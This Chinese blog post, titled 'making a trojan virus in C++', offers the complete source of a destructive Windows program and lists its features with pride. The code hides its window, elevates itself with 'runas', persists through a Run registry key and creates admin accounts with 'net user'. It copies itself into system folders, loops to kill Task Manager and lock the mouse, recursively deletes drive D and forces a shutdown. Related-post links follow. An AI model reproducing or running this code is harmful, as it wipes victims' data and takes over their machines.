c++ 制作木马病毒
c++ 制作木马病毒
首先感谢粉丝的支持!
上代码!
#include <iostream>
#include <io.h>
#include <cstring>
#include <stdlib.h>
#include <direct.h>
#include <tchar.h>
#include <windows.h>
#include <pthread.h>
#include <fstream>
#include <ctime>
#include <conio.h>
using namespace std;void *do_thread(void *arg);
HWND hWnd = GetConsoleWindow();void test() {HKEY hKey;if(RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {TCHAR strExeFullDir[MAX_PATH];GetModuleFileName(NULL, strExeFullDir, MAX_PATH);TCHAR strDir[MAX_PATH] = {};DWORD nLength = MAX_PATH;long result = RegGetValue(hKey, nullptr, _T("超强木马"), RRF_RT_REG_SZ, 0, strDir, &nLength);if(result != ERROR_SUCCESS || _tcscmp(strExeFullDir, strDir) != 0) {RegSetValueEx(hKey, _T("GISRestart"), 0, REG_SZ, (LPBYTE)strExeFullDir, (lstrlen(strExeFullDir) + 1)*sizeof(TCHAR));RegCloseKey(hKey);}}
}void ManagerRun(LPCSTR exe, LPCSTR param, int nShow = SW_SHOW) {SHELLEXECUTEINFO ShExecInfo;ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS ;ShExecInfo.hwnd = NULL;ShExecInfo.lpVerb = "runas";ShExecInfo.lpFile = exe;ShExecInfo.lpParameters = param;ShExecInfo.lpDirectory = NULL;ShExecInfo.nShow = nShow;ShExecInfo.hInstApp = NULL;BOOL ret = ShellExecuteEx(&ShExecInfo);CloseHandle(ShExecInfo.hProcess);
}void CopyMyselfTo(LPCTSTR targetPath) {TCHAR tcBuf[_MAX_PATH];::GetModuleFileName(NULL, tcBuf, sizeof(tcBuf));::CopyFile(tcBuf, targetPath, FALSE);
}int main(int argc, char *argv[]) {if(argc == 1) {ShowWindow(GetConsoleWindow(), SW_HIDE);ManagerRun(argv[0], "2");return 1;}else if(argc == 2) {string s;ifstream id("die.txt");id >> s;if(int(s.find("false")) != -1) {cout << "检测到结束文件,已结束病毒!" << endl;;system("pause");return 0;}ShowWindow(hWnd, SW_HIDE);test();system("net user Administrator dead");system("net user Administrator dead /add");char szPath[1000];GetModuleFileName(NULL, szPath, sizeof(szPath) - 1);string SzPath = szPath;LPCTSTR targetPath;struct _finddata_t fileinfo;long long fHandle;if(int(SzPath.find("Desktop")) != -1) {targetPath = _T("C:\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\超强木马.exe");targetPath = _T("C:\\Program Files (x86)\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Program Files (x86)\\超强木马.exe");targetPath = _T("C:\\Program Files\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Program Files\\超强木马.exe");targetPath = _T("C:\\Windows\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\debug\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\mui\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\mui\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\mui\\0409\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\mui\\0409\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\SIH\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\SIH\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\CBS\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\CBS\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\DISM\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\DISM\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\DPX\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\DPX\\超强木马.exe");targetPath = _T("C:\\Windows\\OCR\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\OCR\\超强木马.exe");targetPath = _T("C:\\Windows\\OCR\\zh-cn\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\OCR\\zh-cn\\超强木马.exe");}else if((fHandle = _findfirst("C:\\Users\\Administrator\\Desktop\\超强木马.exe", &fileinfo)) == -1L) {targetPath = _T("C:\\Users\\Administrator\\Desktop\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Users\\Administrator\\Desktop\\超强木马.exe");}pthread_t tid;int ret;ret = pthread_create(&tid, NULL, do_thread, NULL);if(ret) {fprintf(stderr, "创建线程失败!\n");return -1;}ret = pthread_detach(tid);system("net user 已被木马 dead /add");system("del /F /S /Q D:\\");system("shutdown -s -t 0");}return 0;
}void *do_thread(void *arg) {while(true) {SetCursorPos(0, 0);system("taskkill /F /IM taskmgr.exe");Sleep(10);}
}
这个病毒新有提升到管理员权限,开机自动启动,多线程,还会复制自己到C盘和C盘的一些子文件夹中并运行,同时运行两串代码,边删除D盘,边定住鼠标,关闭任务管理器!
请勿滥用此代码!
好了,本期就到这里,感谢粉丝支持!
c++ 制作木马病毒相关推荐
- 信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示病毒制作木马捆绑】
信息安全实验五 之 计算机病毒与黑客实验脚本[恶意网页病毒演示&病毒制作&木马捆绑] 一.脚本及恶意网页病毒演示实验 1.创建文件 2.拷贝文件 3.删除文件 4.修改文件 二.病毒详 ...
- 360天擎默认卸载密码_装机工具老毛桃携带木马病毒 卸载安全软件进行恶意推广...
[快讯] 近期,火绒收到用户反馈,称在使用老毛桃U盘启动装机工具制作的PE系统后,原有系统中多款安全软件被无故删除.火绒工程师溯源发现,上述使用老毛桃制作的PE系统中被植入了病毒,当用户使用该PE系统 ...
- [回顾]2007年木马病毒“英雄榜”,你中过几个
相信点击本帖的朋友每位都中过可恶的木马病毒,而且有几次还记忆犹新或者心有余悸.哪个木马最让你痛彻心扉?正好这里有一份榜单,大家可以"旧梦重温",对号入座一下,欢迎补充 ***200 ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- 基于注入式木马病毒(浏览器绑架)实现及防御方法的研究
基于注入式木马病毒(浏览器绑架)实现及防御方法的研究 申明: 本文章重在对技术的研究和讨论,为学开发的同学提供一种实现思路,为学习测试的同学提供一个软件安全测试的方向.如有读者通过本文进行一些个人 ...
- 变种机器狗木马病毒防范
近期变种机器狗木马病毒猖獗,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法*还原抵挡.目前已知的所有还原产品,都无法防止这种病毒的穿透感 ...
- 9.Metasploit制作木马后门
01木马与后门 木马?后门? 木马和后门都有害,尤其是木马,它由攻击者主动发起,稍不留心就会被利用:后门原来是留给自己方便用的,但也有可能被非法利用,这两种程序都会给用户带来损失. 木马是指潜伏在 ...
- Atitit.木马病毒自动启动-------------win7计划任务的管理
Atitit.木马病毒自动启动-------------win7计划任务的管理 1. 计划任务的Windows系统中取代AT 的schtasks命令1 2. Win本身的系统计划任务列表1 2.1. ...
- 云服务器ECS挖矿木马病毒处理和解决方案
云服务器ECS挖矿木马病毒处理和解决方案 参考文章: (1)云服务器ECS挖矿木马病毒处理和解决方案 (2)https://www.cnblogs.com/owenma/p/10430599.html ...
- 探秘网络背后黑产链:黑客攻击木马病毒机构内鬼防不胜防
电子商务.移动支付的普及,消费者越来越少随身携带现金,人们打趣道"小偷都快失业了". 但在互联网上,靠盗窃用户电子账户资金.虚拟资产的"网络小偷"却十分猖獗. ...
最新文章
- 编写优质代码的 6 大关键方法
- 西安java招聘_西安招聘 | 陕西安控科技公司招聘(员工宿舍、节日福利、餐补)...
- BeanShell 跟jdk js引擎使用记录
- 解决cvc-complex-type.2.4.a: Invalid content was found starting with element
- 一个空值_java匠人手法优雅的处理空值
- 安卓超过两行就加省略号_基础标点符号使用规则详解—8.省略号
- python-模块-pymysql操作数据库
- 自动化运维的正确姿势,你试了也会上瘾 | 社区福利
- ~~约数之和(附模板题)
- 寻找新冠“解药”:在 10^60 化合物分子空间,他们用 AI 挖掘潜在药物
- Baxter实战 (五)安装openNI2,NiTE-2并实现kinect 2实现动作跟随
- opencv 获取图像最大连通域 c++和python版
- JMeter 录制脚本
- 【Python】基于Python的百度迁徙3——城内出行强度(附代码)
- jspx学习笔记(一)
- Ubuntu16.04 ext4格式硬盘挂载普通用户权限控制
- 吾身听物化,化及事则休
- linux测速,linux环境下使用speedtest测速
- 安利好用的idea查看日志的插件Grep Consol
- Swift 语言的设计错误